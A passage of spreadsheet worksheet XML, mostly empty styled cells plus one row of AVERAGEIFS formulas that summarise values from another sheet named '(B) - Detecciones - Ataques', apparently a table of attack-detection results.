      </c>
      <c r="AR241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS241" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT241" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU241" s="271"/>
      <c r="AV241" s="271"/>
      <c r="AW241" s="271"/>
      <c r="AX241" s="271"/>
      <c r="AY241" s="271"/>
      <c r="AZ241" s="271"/>
      <c r="BA241" s="271"/>
      <c r="BB241" s="271"/>
      <c r="BC241" s="271"/>
      <c r="BD241" s="271"/>
      <c r="BE241" s="271"/>
      <c r="BF241" s="271"/>
      <c r="BG241" s="271"/>
      <c r="BH241" s="271"/>
      <c r="BI241" s="271"/>
      <c r="BJ241" s="271"/>
      <c r="BK241" s="271"/>
      <c r="BL241" s="271"/>
      <c r="BM241" s="271"/>
      <c r="BN241" s="271"/>
      <c r="BO241" s="271"/>
      <c r="BP241" s="271"/>
      <c r="BQ241" s="271"/>
      <c r="BR241" s="271"/>
      <c r="BS241" s="271"/>
      <c r="BT241" s="271"/>
      <c r="BU241" s="271"/>
      <c r="BV241" s="271"/>
      <c r="BW241" s="271"/>
      <c r="BX241" s="271"/>
      <c r="BY241" s="271"/>
      <c r="BZ241" s="271"/>
      <c r="CA241" s="271"/>
      <c r="CB241" s="271"/>
      <c r="CC241" s="271"/>
      <c r="CD241" s="271"/>
      <c r="CE241" s="271"/>
      <c r="CF241" s="271"/>
      <c r="CG241" s="271"/>
      <c r="CH241" s="271"/>
      <c r="CI241" s="271"/>
      <c r="CJ241" s="271"/>
      <c r="CK241" s="271"/>
      <c r="CL241" s="271"/>
      <c r="CM241" s="271"/>
      <c r="CN241" s="271"/>
      <c r="CO241" s="271"/>
      <c r="CP241" s="271"/>
      <c r="CQ241" s="271"/>
      <c r="CR241" s="271"/>
      <c r="CS241" s="271"/>
      <c r="CT241" s="271"/>
      <c r="CU241" s="271"/>
      <c r="CV241" s="271"/>
      <c r="CW241" s="271"/>
      <c r="CX241" s="271"/>
      <c r="CY241" s="271"/>
      <c r="CZ241" s="271"/>
      <c r="DA241" s="271"/>
      <c r="DB241" s="271"/>
      <c r="DC241" s="271"/>
      <c r="DD241" s="271"/>
      <c r="DE241" s="271"/>
      <c r="DF241" s="271"/>
      <c r="DG241" s="271"/>
      <c r="DH241" s="271"/>
      <c r="DI241" s="271"/>
      <c r="DJ241" s="271"/>
      <c r="DK241" s="271"/>
    </row>
    <row r="242">
      <c r="Q242" s="271"/>
      <c r="R242" s="271"/>
      <c r="S242" s="271"/>
      <c r="T242" s="271"/>
      <c r="U242" s="271"/>
      <c r="V242" s="271"/>
      <c r="W242" s="271"/>
      <c r="X242" s="271"/>
      <c r="Y242" s="271"/>
      <c r="Z242" s="271"/>
      <c r="AA242" s="271"/>
      <c r="AB242" s="271"/>
      <c r="AC242" s="271"/>
      <c r="AD242" s="271"/>
      <c r="AE242" s="271"/>
      <c r="AF242" s="271"/>
      <c r="AG242" s="271"/>
      <c r="AH242" s="352" t="s">
        <v>394</v>
      </c>
      <c r="AI242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS242" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT242" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU242" s="271"/>
      <c r="AV242" s="271"/>
      <c r="AW242" s="271"/>
      <c r="AX242" s="271"/>
      <c r="AY242" s="271"/>
      <c r="AZ242" s="271"/>
      <c r="BA242" s="271"/>
      <c r="BB242" s="271"/>
      <c r="BC242" s="271"/>
      <c r="BD242" s="271"/>
      <c r="BE242" s="271"/>
      <c r="BF242" s="271"/>
      <c r="BG242" s="271"/>
      <c r="BH242" s="271"/>
      <c r="BI242" s="271"/>
      <c r="BJ242" s="271"/>
      <c r="BK242" s="271"/>
      <c r="BL242" s="271"/>
      <c r="BM242" s="271"/>
      <c r="BN242" s="271"/>
      <c r="BO242" s="271"/>
      <c r="BP242" s="271"/>
      <c r="BQ242" s="271"/>
      <c r="BR242" s="271"/>
      <c r="BS242" s="271"/>
      <c r="BT242" s="271"/>
      <c r="BU242" s="271"/>
      <c r="BV242" s="271"/>
      <c r="BW242" s="271"/>
      <c r="BX242" s="271"/>
      <c r="BY242" s="271"/>
      <c r="BZ242" s="271"/>
      <c r="CA242" s="271"/>
      <c r="CB242" s="271"/>
      <c r="CC242" s="271"/>
      <c r="CD242" s="271"/>
      <c r="CE242" s="271"/>
      <c r="CF242" s="271"/>
      <c r="CG242" s="271"/>
      <c r="CH242" s="271"/>
      <c r="CI242" s="271"/>
      <c r="CJ242" s="271"/>
      <c r="CK242" s="271"/>
      <c r="CL242" s="271"/>
      <c r="CM242" s="271"/>
      <c r="CN242" s="271"/>
      <c r="CO242" s="271"/>
      <c r="CP242" s="271"/>
      <c r="CQ242" s="271"/>
      <c r="CR242" s="271"/>
      <c r="CS242" s="271"/>
      <c r="CT242" s="271"/>
      <c r="CU242" s="271"/>
      <c r="CV242" s="271"/>
      <c r="CW242" s="271"/>
      <c r="CX242" s="271"/>
      <c r="CY242" s="271"/>
      <c r="CZ242" s="271"/>
      <c r="DA242" s="271"/>
      <c r="DB242" s="271"/>
      <c r="DC242" s="271"/>
      <c r="DD242" s="271"/>
      <c r="DE242" s="271"/>
      <c r="DF242" s="271"/>
      <c r="DG242" s="271"/>
      <c r="DH242" s="271"/>
      <c r="DI242" s="271"/>
      <c r="DJ242" s="271"/>
      <c r="DK242" s="271"/>
    </row>
    <row r="243">
      <c r="Q243" s="271"/>
      <c r="R243" s="271"/>
      <c r="S243" s="271"/>
      <c r="T243" s="271"/>
      <c r="U243" s="271"/>
      <c r="V243" s="271"/>
      <c r="W243" s="271"/>
      <c r="X243" s="271"/>
      <c r="Y243" s="271"/>
      <c r="Z243" s="271"/>
      <c r="AA243" s="271"/>
      <c r="AB243" s="271"/>
      <c r="AC243" s="271"/>
      <c r="AD243" s="271"/>
      <c r="AE243" s="271"/>
      <c r="AF243" s="271"/>
      <c r="AG243" s="271"/>
      <c r="AH243" s="352" t="s">
        <v>1687</v>
      </c>
      <c r="AI243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS243" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT243" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU243" s="271"/>
      <c r="AV243" s="271"/>
      <c r="AW243" s="271"/>
      <c r="AX243" s="271"/>
      <c r="AY243" s="271"/>
      <c r="AZ243" s="271"/>
      <c r="BA243" s="271"/>
      <c r="BB243" s="271"/>
      <c r="BC243" s="271"/>
      <c r="BD243" s="271"/>
      <c r="BE243" s="271"/>
      <c r="BF243" s="271"/>
      <c r="BG243" s="271"/>
      <c r="BH243" s="271"/>
      <c r="BI243" s="271"/>
      <c r="BJ243" s="271"/>
      <c r="BK243" s="271"/>
      <c r="BL243" s="271"/>
      <c r="BM243" s="271"/>
      <c r="BN243" s="271"/>
      <c r="BO243" s="271"/>
      <c r="BP243" s="271"/>
      <c r="BQ243" s="271"/>
      <c r="BR243" s="271"/>
      <c r="BS243" s="271"/>
      <c r="BT243" s="271"/>
      <c r="BU243" s="271"/>
      <c r="BV243" s="271"/>
      <c r="BW243" s="271"/>
      <c r="BX243" s="271"/>
      <c r="BY243" s="271"/>
      <c r="BZ243" s="271"/>
      <c r="CA243" s="271"/>
      <c r="CB243" s="271"/>
      <c r="CC243" s="271"/>
      <c r="CD243" s="271"/>
      <c r="CE243" s="271"/>
      <c r="CF243" s="271"/>
      <c r="CG243" s="271"/>
      <c r="CH243" s="271"/>
      <c r="CI243" s="271"/>
      <c r="CJ243" s="271"/>
      <c r="CK243" s="271"/>
      <c r="CL243" s="271"/>
      <c r="CM243" s="271"/>
      <c r="CN243" s="271"/>
      <c r="CO243" s="271"/>
      <c r="CP243" s="271"/>
      <c r="CQ243" s="271"/>
      <c r="CR243" s="271"/>
      <c r="CS243" s="271"/>
      <c r="CT243" s="271"/>
      <c r="CU243" s="271"/>
      <c r="CV243" s="271"/>
      <c r="CW243" s="271"/>
      <c r="CX243" s="271"/>
      <c r="CY243" s="271"/>
      <c r="CZ243" s="271"/>
      <c r="DA243" s="271"/>
      <c r="DB243" s="271"/>
      <c r="DC243" s="271"/>
      <c r="DD243" s="271"/>
      <c r="DE243" s="271"/>
      <c r="DF243" s="271"/>
      <c r="DG243" s="271"/>
      <c r="DH243" s="271"/>
      <c r="DI243" s="271"/>
      <c r="DJ243" s="271"/>
      <c r="DK243" s="271"/>
    </row>
    <row r="244">
      <c r="Q244" s="271"/>
      <c r="R244" s="271"/>
      <c r="S244" s="271"/>
      <c r="T244" s="271"/>
      <c r="U244" s="271"/>
      <c r="V244" s="271"/>
      <c r="W244" s="271"/>
      <c r="X244" s="271"/>
      <c r="Y244" s="271"/>
      <c r="Z244" s="271"/>
      <c r="AA244" s="271"/>
      <c r="AB244" s="271"/>
      <c r="AC244" s="271"/>
      <c r="AD244" s="271"/>
      <c r="AE244" s="271"/>
      <c r="AF244" s="271"/>
      <c r="AG244" s="271"/>
      <c r="AH244" s="352" t="s">
        <v>486</v>
      </c>
      <c r="AI244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS244" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT244" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU244" s="271"/>
      <c r="AV244" s="271"/>
      <c r="AW244" s="271"/>
      <c r="AX244" s="271"/>
      <c r="AY244" s="271"/>
      <c r="AZ244" s="271"/>
      <c r="BA244" s="271"/>
      <c r="BB244" s="271"/>
      <c r="BC244" s="271"/>
      <c r="BD244" s="271"/>
      <c r="BE244" s="271"/>
      <c r="BF244" s="271"/>
      <c r="BG244" s="271"/>
      <c r="BH244" s="271"/>
      <c r="BI244" s="271"/>
      <c r="BJ244" s="271"/>
      <c r="BK244" s="271"/>
      <c r="BL244" s="271"/>
      <c r="BM244" s="271"/>
      <c r="BN244" s="271"/>
      <c r="BO244" s="271"/>
      <c r="BP244" s="271"/>
      <c r="BQ244" s="271"/>
      <c r="BR244" s="271"/>
      <c r="BS244" s="271"/>
      <c r="BT244" s="271"/>
      <c r="BU244" s="271"/>
      <c r="BV244" s="271"/>
      <c r="BW244" s="271"/>
      <c r="BX244" s="271"/>
      <c r="BY244" s="271"/>
      <c r="BZ244" s="271"/>
      <c r="CA244" s="271"/>
      <c r="CB244" s="271"/>
      <c r="CC244" s="271"/>
      <c r="CD244" s="271"/>
      <c r="CE244" s="271"/>
      <c r="CF244" s="271"/>
      <c r="CG244" s="271"/>
      <c r="CH244" s="271"/>
      <c r="CI244" s="271"/>
      <c r="CJ244" s="271"/>
      <c r="CK244" s="271"/>
      <c r="CL244" s="271"/>
      <c r="CM244" s="271"/>
      <c r="CN244" s="271"/>
      <c r="CO244" s="271"/>
      <c r="CP244" s="271"/>
      <c r="CQ244" s="271"/>
      <c r="CR244" s="271"/>
      <c r="CS244" s="271"/>
      <c r="CT244" s="271"/>
      <c r="CU244" s="271"/>
      <c r="CV244" s="271"/>
      <c r="CW244" s="271"/>
      <c r="CX244" s="271"/>
      <c r="CY244" s="271"/>
      <c r="CZ244" s="271"/>
      <c r="DA244" s="271"/>
      <c r="DB244" s="271"/>
      <c r="DC244" s="271"/>
      <c r="DD244" s="271"/>
      <c r="DE244" s="271"/>
      <c r="DF244" s="271"/>
      <c r="DG244" s="271"/>
      <c r="DH244" s="271"/>
      <c r="DI244" s="271"/>
      <c r="DJ244" s="271"/>
      <c r="DK244" s="271"/>
    </row>
    <row r="245">
      <c r="Q245" s="271"/>
      <c r="R245" s="271"/>
      <c r="S245" s="271"/>
      <c r="T245" s="271"/>
      <c r="U245" s="271"/>
      <c r="V245" s="271"/>
      <c r="W245" s="271"/>
      <c r="X245" s="271"/>
      <c r="Y245" s="271"/>
      <c r="Z245" s="271"/>
      <c r="AA245" s="271"/>
      <c r="AB245" s="271"/>
      <c r="AC245" s="271"/>
      <c r="AD245" s="271"/>
      <c r="AE245" s="271"/>
      <c r="AF245" s="271"/>
      <c r="AG245" s="271"/>
      <c r="AH245" s="352" t="s">
        <v>1889</v>
      </c>
      <c r="AI245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS245" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT245" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU245" s="271"/>
      <c r="AV245" s="271"/>
      <c r="AW245" s="271"/>
      <c r="AX245" s="271"/>
      <c r="AY245" s="271"/>
      <c r="AZ245" s="271"/>
      <c r="BA245" s="271"/>
      <c r="BB245" s="271"/>
      <c r="BC245" s="271"/>
      <c r="BD245" s="271"/>
      <c r="BE245" s="271"/>
      <c r="BF245" s="271"/>
      <c r="BG245" s="271"/>
      <c r="BH245" s="271"/>
      <c r="BI245" s="271"/>
      <c r="BJ245" s="271"/>
      <c r="BK245" s="271"/>
      <c r="BL245" s="271"/>
      <c r="BM245" s="271"/>
      <c r="BN245" s="271"/>
      <c r="BO245" s="271"/>
      <c r="BP245" s="271"/>
      <c r="BQ245" s="271"/>
      <c r="BR245" s="271"/>
      <c r="BS245" s="271"/>
      <c r="BT245" s="271"/>
      <c r="BU245" s="271"/>
      <c r="BV245" s="271"/>
      <c r="BW245" s="271"/>
      <c r="BX245" s="271"/>
      <c r="BY245" s="271"/>
      <c r="BZ245" s="271"/>
      <c r="CA245" s="271"/>
      <c r="CB245" s="271"/>
      <c r="CC245" s="271"/>
      <c r="CD245" s="271"/>
      <c r="CE245" s="271"/>
      <c r="CF245" s="271"/>
      <c r="CG245" s="271"/>
      <c r="CH245" s="271"/>
      <c r="CI245" s="271"/>
      <c r="CJ245" s="271"/>
      <c r="CK245" s="271"/>
      <c r="CL245" s="271"/>
      <c r="CM245" s="271"/>
      <c r="CN245" s="271"/>
      <c r="CO245" s="271"/>
      <c r="CP245" s="271"/>
      <c r="CQ245" s="271"/>
      <c r="CR245" s="271"/>
      <c r="CS245" s="271"/>
      <c r="CT245" s="271"/>
      <c r="CU245" s="271"/>
      <c r="CV245" s="271"/>
      <c r="CW245" s="271"/>
      <c r="CX245" s="271"/>
      <c r="CY245" s="271"/>
      <c r="CZ245" s="271"/>
      <c r="DA245" s="271"/>
      <c r="DB245" s="271"/>
      <c r="DC245" s="271"/>
      <c r="DD245" s="271"/>
      <c r="DE245" s="271"/>
      <c r="DF245" s="271"/>
      <c r="DG245" s="271"/>
      <c r="DH245" s="271"/>
      <c r="DI245" s="271"/>
      <c r="DJ245" s="271"/>
      <c r="DK245" s="271"/>
    </row>
    <row r="246">
      <c r="Q246" s="271"/>
      <c r="R246" s="271"/>
      <c r="S246" s="271"/>
      <c r="T246" s="271"/>
      <c r="U246" s="271"/>
      <c r="V246" s="271"/>
      <c r="W246" s="271"/>
      <c r="X246" s="271"/>
      <c r="Y246" s="271"/>
      <c r="Z246" s="271"/>
      <c r="AA246" s="271"/>
      <c r="AB246" s="271"/>
      <c r="AC246" s="271"/>
      <c r="AD246" s="271"/>
      <c r="AE246" s="271"/>
      <c r="AF246" s="271"/>
      <c r="AG246" s="271"/>
      <c r="AH246" s="352" t="s">
        <v>1187</v>
      </c>
      <c r="AI246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS246" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT246" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU246" s="271"/>
      <c r="AV246" s="271"/>
      <c r="AW246" s="271"/>
      <c r="AX246" s="271"/>
      <c r="AY246" s="271"/>
      <c r="AZ246" s="271"/>
      <c r="BA246" s="271"/>
      <c r="BB246" s="271"/>
      <c r="BC246" s="271"/>
      <c r="BD246" s="271"/>
      <c r="BE246" s="271"/>
      <c r="BF246" s="271"/>
      <c r="BG246" s="271"/>
      <c r="BH246" s="271"/>
      <c r="BI246" s="271"/>
      <c r="BJ246" s="271"/>
      <c r="BK246" s="271"/>
      <c r="BL246" s="271"/>
      <c r="BM246" s="271"/>
      <c r="BN246" s="271"/>
      <c r="BO246" s="271"/>
      <c r="BP246" s="271"/>
      <c r="BQ246" s="271"/>
      <c r="BR246" s="271"/>
      <c r="BS246" s="271"/>
      <c r="BT246" s="271"/>
      <c r="BU246" s="271"/>
      <c r="BV246" s="271"/>
      <c r="BW246" s="271"/>
      <c r="BX246" s="271"/>
      <c r="BY246" s="271"/>
      <c r="BZ246" s="271"/>
      <c r="CA246" s="271"/>
      <c r="CB246" s="271"/>
      <c r="CC246" s="271"/>
      <c r="CD246" s="271"/>
      <c r="CE246" s="271"/>
      <c r="CF246" s="271"/>
      <c r="CG246" s="271"/>
      <c r="CH246" s="271"/>
      <c r="CI246" s="271"/>
      <c r="CJ246" s="271"/>
      <c r="CK246" s="271"/>
      <c r="CL246" s="271"/>
      <c r="CM246" s="271"/>
      <c r="CN246" s="271"/>
      <c r="CO246" s="271"/>
      <c r="CP246" s="271"/>
      <c r="CQ246" s="271"/>
      <c r="CR246" s="271"/>
      <c r="CS246" s="271"/>
      <c r="CT246" s="271"/>
      <c r="CU246" s="271"/>
      <c r="CV246" s="271"/>
      <c r="CW246" s="271"/>
      <c r="CX246" s="271"/>
      <c r="CY246" s="271"/>
      <c r="CZ246" s="271"/>
      <c r="DA246" s="271"/>
      <c r="DB246" s="271"/>
      <c r="DC246" s="271"/>
      <c r="DD246" s="271"/>
      <c r="DE246" s="271"/>
      <c r="DF246" s="271"/>
      <c r="DG246" s="271"/>
      <c r="DH246" s="271"/>
      <c r="DI246" s="271"/>
      <c r="DJ246" s="271"/>
      <c r="DK246" s="271"/>
    </row>
    <row r="247">
      <c r="Q247" s="271"/>
      <c r="R247" s="271"/>
      <c r="S247" s="271"/>
      <c r="T247" s="271"/>
      <c r="U247" s="271"/>
      <c r="V247" s="271"/>
      <c r="W247" s="271"/>
      <c r="X247" s="271"/>
      <c r="Y247" s="271"/>
      <c r="Z247" s="271"/>
      <c r="AA247" s="271"/>
      <c r="AB247" s="271"/>
      <c r="AC247" s="271"/>
      <c r="AD247" s="271"/>
      <c r="AE247" s="271"/>
      <c r="AF247" s="271"/>
      <c r="AG247" s="271"/>
      <c r="AH247" s="352" t="s">
        <v>560</v>
      </c>
      <c r="AI247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="AJ247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AK247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AL247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AM247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BQ$3:$BQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="AN247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DG$3:$DG$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AO247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EW$3:$EW$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AP247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GM$3:$GM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AQ247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BT$3:$BT$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="AR247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DJ$3:$DJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AS247" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$EZ$3:$EZ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AT247" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GP$3:$GP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1</v>
      </c>
      <c r="AU247" s="271"/>
      <c r="AV247" s="271"/>
      <c r="AW247" s="271"/>
      <c r="AX247" s="271"/>
      <c r="AY247" s="271"/>
      <c r="AZ247" s="271"/>
      <c r="BA247" s="271"/>
      <c r="BB247" s="271"/>
      <c r="BC247" s="271"/>
      <c r="BD247" s="271"/>
      <c r="BE247" s="271"/>
      <c r="BF247" s="271"/>
      <c r="BG247" s="271"/>
      <c r="BH247" s="271"/>
      <c r="BI247" s="271"/>
      <c r="BJ247" s="271"/>
      <c r="BK247" s="271"/>
      <c r="BL247" s="271"/>
      <c r="BM247" s="271"/>
      <c r="BN247" s="271"/>
      <c r="BO247" s="271"/>
      <c r="BP247" s="271"/>
      <c r="BQ247" s="271"/>
      <c r="BR247" s="271"/>
      <c r="BS247" s="271"/>
      <c r="BT247" s="271"/>
      <c r="BU247" s="271"/>
      <c r="BV247" s="271"/>
      <c r="BW247" s="271"/>
      <c r="BX247" s="271"/>
      <c r="BY247" s="271"/>
      <c r="BZ247" s="271"/>
      <c r="CA247" s="271"/>
      <c r="CB247" s="271"/>
      <c r="CC247" s="271"/>
      <c r="CD247" s="271"/>
      <c r="CE247" s="271"/>
      <c r="CF247" s="271"/>
      <c r="CG247" s="271"/>
      <c r="CH247" s="271"/>
      <c r="CI247" s="271"/>
      <c r="CJ247" s="271"/>
      <c r="CK247" s="271"/>
      <c r="CL247" s="271"/>
      <c r="CM247" s="271"/>
      <c r="CN247" s="271"/>
      <c r="CO247" s="271"/>
      <c r="CP247" s="271"/>
      <c r="CQ247" s="271"/>
      <c r="CR247" s="271"/>
      <c r="CS247" s="271"/>
      <c r="CT247" s="271"/>
      <c r="CU247" s="271"/>
      <c r="CV247" s="271"/>
      <c r="CW247" s="271"/>
      <c r="CX247" s="271"/>
      <c r="CY247" s="271"/>
      <c r="CZ247" s="271"/>
      <c r="DA247" s="271"/>
      <c r="DB247" s="271"/>
      <c r="DC247" s="271"/>
      <c r="DD247" s="271"/>
      <c r="DE247" s="271"/>
      <c r="DF247" s="271"/>
      <c r="DG247" s="271"/>
      <c r="DH247" s="271"/>
      <c r="DI247" s="271"/>
      <c r="DJ247" s="271"/>
      <c r="DK247" s="271"/>
    </row>
    <row r="248">
      <c r="Q248" s="271"/>
      <c r="R248" s="271"/>
      <c r="S248" s="271"/>
      <c r="T248" s="271"/>
      <c r="U248" s="271"/>
      <c r="V248" s="271"/>
      <c r="W248" s="271"/>
      <c r="X248" s="271"/>
      <c r="Y248" s="271"/>
      <c r="Z248" s="271"/>
      <c r="AA248" s="271"/>
      <c r="AB248" s="271"/>
      <c r="AC248" s="271"/>
      <c r="AD248" s="271"/>
      <c r="AE248" s="271"/>
      <c r="AF248" s="271"/>
      <c r="AG248" s="271"/>
      <c r="AH248" s="352" t="s">
        <v>1175</v>
      </c>
      <c r="AI248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AJ248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AK248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AL248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AM248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AN248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AR248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AS248" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT248" s="549" t="s">
        <v>12</v>
      </c>
      <c r="AU248" s="271"/>
      <c r="AV248" s="271"/>
      <c r="AW248" s="271"/>
      <c r="AX248" s="271"/>
      <c r="AY248" s="271"/>
      <c r="AZ248" s="271"/>
      <c r="BA248" s="271"/>
      <c r="BB248" s="271"/>
      <c r="BC248" s="271"/>
      <c r="BD248" s="271"/>
      <c r="BE248" s="271"/>
      <c r="BF248" s="271"/>
      <c r="BG248" s="271"/>
      <c r="BH248" s="271"/>
      <c r="BI248" s="271"/>
      <c r="BJ248" s="271"/>
      <c r="BK248" s="271"/>
      <c r="BL248" s="271"/>
      <c r="BM248" s="271"/>
      <c r="BN248" s="271"/>
      <c r="BO248" s="271"/>
      <c r="BP248" s="271"/>
      <c r="BQ248" s="271"/>
      <c r="BR248" s="271"/>
      <c r="BS248" s="271"/>
      <c r="BT248" s="271"/>
      <c r="BU248" s="271"/>
      <c r="BV248" s="271"/>
      <c r="BW248" s="271"/>
      <c r="BX248" s="271"/>
      <c r="BY248" s="271"/>
      <c r="BZ248" s="271"/>
      <c r="CA248" s="271"/>
      <c r="CB248" s="271"/>
      <c r="CC248" s="271"/>
      <c r="CD248" s="271"/>
      <c r="CE248" s="271"/>
      <c r="CF248" s="271"/>
      <c r="CG248" s="271"/>
      <c r="CH248" s="271"/>
      <c r="CI248" s="271"/>
      <c r="CJ248" s="271"/>
      <c r="CK248" s="271"/>
      <c r="CL248" s="271"/>
      <c r="CM248" s="271"/>
      <c r="CN248" s="271"/>
      <c r="CO248" s="271"/>
      <c r="CP248" s="271"/>
      <c r="CQ248" s="271"/>
      <c r="CR248" s="271"/>
      <c r="CS248" s="271"/>
      <c r="CT248" s="271"/>
      <c r="CU248" s="271"/>
      <c r="CV248" s="271"/>
      <c r="CW248" s="271"/>
      <c r="CX248" s="271"/>
      <c r="CY248" s="271"/>
